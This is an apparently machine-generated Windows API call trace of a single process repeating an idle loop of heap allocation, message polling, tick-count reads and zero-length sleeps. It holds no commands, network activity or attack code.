0x0 [0064.504] GetCurrentProcessId () returned 0xa44 [0064.504] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.504] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.504] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.504] GetTickCount () returned 0x1caad [0064.504] GetTickCount () returned 0x1caad [0064.504] GetTickCount () returned 0x1caad [0064.504] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.504] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.504] GetTickCount () returned 0x1caad [0064.504] Sleep (dwMilliseconds=0x0) [0064.519] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.534] GetLastError () returned 0x0 [0064.534] GetCurrentProcessId () returned 0xa44 [0064.535] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.535] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.535] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.535] GetTickCount () returned 0x1cacd [0064.535] GetTickCount () returned 0x1cacd [0064.535] GetTickCount () returned 0x1cacd [0064.535] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.535] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.535] GetTickCount () returned 0x1cacd [0064.535] Sleep (dwMilliseconds=0x0) [0064.550] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.566] GetLastError () returned 0x0 [0064.566] GetCurrentProcessId () returned 0xa44 [0064.566] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.566] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.566] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.566] GetTickCount () returned 0x1caec [0064.566] GetTickCount () returned 0x1caec [0064.566] GetTickCount () returned 0x1caec [0064.566] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.566] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.566] GetTickCount () returned 0x1caec [0064.566] Sleep (dwMilliseconds=0x0) [0064.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.583] GetLastError () returned 0x0 [0064.584] GetCurrentProcessId () returned 0xa44 [0064.584] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.584] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.584] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.584] GetTickCount () returned 0x1cafb [0064.584] GetTickCount () returned 0x1cafb [0064.584] GetTickCount () returned 0x1cafb [0064.584] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.584] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.584] GetTickCount () returned 0x1cafb [0064.584] Sleep (dwMilliseconds=0x0) [0064.597] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.613] GetLastError () returned 0x0 [0064.613] GetCurrentProcessId () returned 0xa44 [0064.613] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.613] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.613] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.613] GetTickCount () returned 0x1cb1b [0064.613] GetTickCount () returned 0x1cb1b [0064.613] GetTickCount () returned 0x1cb1b [0064.613] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.613] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.613] GetTickCount () returned 0x1cb1b [0064.613] Sleep (dwMilliseconds=0x0) [0064.628] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.644] GetLastError () returned 0x0 [0064.644] GetCurrentProcessId () returned 0xa44 [0064.644] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.644] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.644] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.644] GetTickCount () returned 0x1cb3a [0064.644] GetTickCount () returned 0x1cb3a [0064.644] GetTickCount () returned 0x1cb3a [0064.644] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.644] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.644] GetTickCount () returned 0x1cb3a [0064.644] Sleep (dwMilliseconds=0x0) [0064.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.659] GetLastError () returned 0x0 [0064.659] GetCurrentProcessId () returned 0xa44 [0064.660] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.660] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.660] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.660] GetTickCount () returned 0x1cb49 [0064.660] GetTickCount () returned 0x1cb49 [0064.660] GetTickCount () returned 0x1cb49 [0064.660] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.660] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.660] GetTickCount () returned 0x1cb49 [0064.660] Sleep (dwMilliseconds=0x0) [0064.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.690] GetLastError () returned 0x0 [0064.691] GetCurrentProcessId () returned 0xa44 [0064.691] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.691] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.691] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.691] GetTickCount () returned 0x1cb69 [0064.691] GetTickCount () returned 0x1cb69 [0064.691] GetTickCount () returned 0x1cb69 [0064.691] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.691] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.691] GetTickCount () returned 0x1cb69 [0064.691] Sleep (dwMilliseconds=0x0) [0064.706] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.722] GetLastError () returned 0x0 [0064.722] GetCurrentProcessId () returned 0xa44 [0064.722] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.722] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.722] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.722] GetTickCount () returned 0x1cb88 [0064.722] GetTickCount () returned 0x1cb88 [0064.722] GetTickCount () returned 0x1cb88 [0064.722] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.722] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.722] GetTickCount () returned 0x1cb88 [0064.722] Sleep (dwMilliseconds=0x0) [0064.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.753] GetLastError () returned 0x0 [0064.753] GetCurrentProcessId () returned 0xa44 [0064.753] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.753] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.753] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.753] GetTickCount () returned 0x1cba7 [0064.753] GetTickCount () returned 0x1cba7 [0064.753] GetTickCount () returned 0x1cba7 [0064.753] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.753] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.753] GetTickCount () returned 0x1cba7 [0064.753] Sleep (dwMilliseconds=0x0) [0064.784] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.803] GetLastError () returned 0x0 [0064.803] GetCurrentProcessId () returned 0xa44 [0064.803] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.803] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.803] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.803] GetTickCount () returned 0x1cbd6 [0064.803] GetTickCount () returned 0x1cbd6 [0064.803] GetTickCount () returned 0x1cbd6 [0064.803] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.803] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.803] GetTickCount () returned 0x1cbd6 [0064.803] Sleep (dwMilliseconds=0x0) [0064.815] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.847] GetLastError () returned 0x0 [0064.847] GetCurrentProcessId () returned 0xa44 [0064.847] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.847] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.847] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.847] GetTickCount () returned 0x1cc05 [0064.847] GetTickCount () returned 0x1cc05 [0064.847] GetTickCount () returned 0x1cc05 [0064.847] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.847] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.847] GetTickCount () returned 0x1cc05 [0064.847] Sleep (dwMilliseconds=0x0) [0064.862] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.862] GetLastError () returned 0x0 [0064.862] GetCurrentProcessId () returned 0xa44 [0064.862] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.862] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.862] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.862] GetTickCount () returned 0x1cc14 [0064.862] GetTickCount () returned 0x1cc14 [0064.862] GetTickCount () returned 0x1cc14 [0064.862] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.863] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.863] GetTickCount () returned 0x1cc14 [0064.863] Sleep (dwMilliseconds=0x0) [0064.864] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.878] GetLastError () returned 0x0 [0064.878] GetCurrentProcessId () returned 0xa44 [0064.878] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.878] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.878] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.878] GetTickCount () returned 0x1cc24 [0064.878] GetTickCount () returned 0x1cc24 [0064.878] GetTickCount () returned 0x1cc24 [0064.878] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.878] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.878] GetTickCount () returned 0x1cc24 [0064.878] Sleep (dwMilliseconds=0x0) [0064.893] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.894] GetLastError () returned 0x0 [0064.894] GetCurrentProcessId () returned 0xa44 [0064.894] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.894] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.894] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.894] GetTickCount () returned 0x1cc33 [0064.894] GetTickCount () returned 0x1cc33 [0064.894] GetTickCount () returned 0x1cc33 [0064.894] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.894] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.894] GetTickCount () returned 0x1cc33 [0064.894] Sleep (dwMilliseconds=0x0) [0064.910] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.924] GetLastError () returned 0x0 [0064.924] GetCurrentProcessId () returned 0xa44 [0064.924] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.925] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.925] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.925] GetTickCount () returned 0x1cc53 [0064.925] GetTickCount () returned 0x1cc53 [0064.925] GetTickCount () returned 0x1cc53 [0064.925] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.925] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.925] GetTickCount () returned 0x1cc53 [0064.925] Sleep (dwMilliseconds=0x0) [0064.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.940] GetLastError () returned 0x0 [0064.940] GetCurrentProcessId () returned 0xa44 [0064.940] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.940] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.940] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.940] GetTickCount () returned 0x1cc62 [0064.940] GetTickCount () returned 0x1cc62 [0064.940] GetTickCount () returned 0x1cc62 [0064.940] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.940] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.940] GetTickCount () returned 0x1cc62 [0064.941] Sleep (dwMilliseconds=0x0) [0064.971] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0064.987] GetLastError () returned 0x0 [0064.987] GetCurrentProcessId () returned 0xa44 [0064.987] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0064.987] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0064.987] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0064.987] GetTickCount () returned 0x1cc91 [0064.987] GetTickCount () returned 0x1cc91 [0064.987] GetTickCount () returned 0x1cc91 [0064.987] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0064.987] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0064.987] GetTickCount () returned 0x1cc91 [0064.987] Sleep (dwMilliseconds=0x0) [0065.002] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.034] GetLastError () returned 0x0 [0065.034] GetCurrentProcessId () returned 0xa44 [0065.034] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.034] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.034] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.034] GetTickCount () returned 0x1ccc0 [0065.034] GetTickCount () returned 0x1ccc0 [0065.034] GetTickCount () returned 0x1ccc0 [0065.034] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.034] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.034] GetTickCount () returned 0x1ccc0 [0065.034] Sleep (dwMilliseconds=0x0) [0065.049] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.049] GetLastError () returned 0x0 [0065.049] GetCurrentProcessId () returned 0xa44 [0065.049] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.050] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.050] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.050] GetTickCount () returned 0x1cccf [0065.050] GetTickCount () returned 0x1cccf [0065.050] GetTickCount () returned 0x1cccf [0065.050] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.050] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.050] GetTickCount () returned 0x1cccf [0065.050] Sleep (dwMilliseconds=0x0) [0065.065] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.085] GetLastError () returned 0x0 [0065.085] GetCurrentProcessId () returned 0xa44 [0065.085] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.085] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.085] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.085] GetTickCount () returned 0x1ccef [0065.085] GetTickCount () returned 0x1ccef [0065.085] GetTickCount () returned 0x1ccef [0065.085] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.086] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.086] GetTickCount () returned 0x1ccef [0065.086] Sleep (dwMilliseconds=0x0) [0065.102] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.112] GetLastError () returned 0x0 [0065.112] GetCurrentProcessId () returned 0xa44 [0065.112] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.112] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.112] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.112] GetTickCount () returned 0x1cd0e [0065.112] GetTickCount () returned 0x1cd0e [0065.112] GetTickCount () returned 0x1cd0e [0065.112] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.112] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.112] GetTickCount () returned 0x1cd0e [0065.112] Sleep (dwMilliseconds=0x0) [0065.127] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.161] GetLastError () returned 0x0 [0065.161] GetCurrentProcessId () returned 0xa44 [0065.161] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.161] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.161] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.161] GetTickCount () returned 0x1cd3d [0065.161] GetTickCount () returned 0x1cd3d [0065.161] GetTickCount () returned 0x1cd3d [0065.161] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.161] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.161] GetTickCount () returned 0x1cd3d [0065.161] Sleep (dwMilliseconds=0x0) [0065.161] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.174] GetLastError () returned 0x0 [0065.174] GetCurrentProcessId () returned 0xa44 [0065.174] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.174] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.174] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.174] GetTickCount () returned 0x1cd4c [0065.174] GetTickCount () returned 0x1cd4c [0065.174] GetTickCount () returned 0x1cd4c [0065.174] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.174] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.174] GetTickCount () returned 0x1cd4c [0065.174] Sleep (dwMilliseconds=0x0) [0065.176] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.190] GetLastError () returned 0x0 [0065.190] GetCurrentProcessId () returned 0xa44 [0065.190] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.190] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.190] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.190] GetTickCount () returned 0x1cd5c [0065.190] GetTickCount () returned 0x1cd5c [0065.190] GetTickCount () returned 0x1cd5c [0065.190] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.190] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.190] GetTickCount () returned 0x1cd5c [0065.190] Sleep (dwMilliseconds=0x0) [0065.190] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.221] GetLastError () returned 0x0 [0065.221] GetCurrentProcessId () returned 0xa44 [0065.221] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.221] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.221] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.221] GetTickCount () returned 0x1cd7b [0065.221] GetTickCount () returned 0x1cd7b [0065.221] GetTickCount () returned 0x1cd7b [0065.221] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.221] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.221] GetTickCount () returned 0x1cd7b [0065.221] Sleep (dwMilliseconds=0x0) [0065.236] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.252] GetLastError () returned 0x0 [0065.252] GetCurrentProcessId () returned 0xa44 [0065.252] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.252] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.252] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.252] GetTickCount () returned 0x1cd9a [0065.252] GetTickCount () returned 0x1cd9a [0065.252] GetTickCount () returned 0x1cd9a [0065.252] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.252] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.252] GetTickCount () returned 0x1cd9a [0065.252] Sleep (dwMilliseconds=0x0) [0065.267] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.283] GetLastError () returned 0x0 [0065.283] GetCurrentProcessId () returned 0xa44 [0065.283] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.283] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.283] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.283] GetTickCount () returned 0x1cdb9 [0065.283] GetTickCount () returned 0x1cdb9 [0065.283] GetTickCount () returned 0x1cdb9 [0065.283] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.283] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.284] GetTickCount () returned 0x1cdb9 [0065.284] Sleep (dwMilliseconds=0x0) [0065.299] 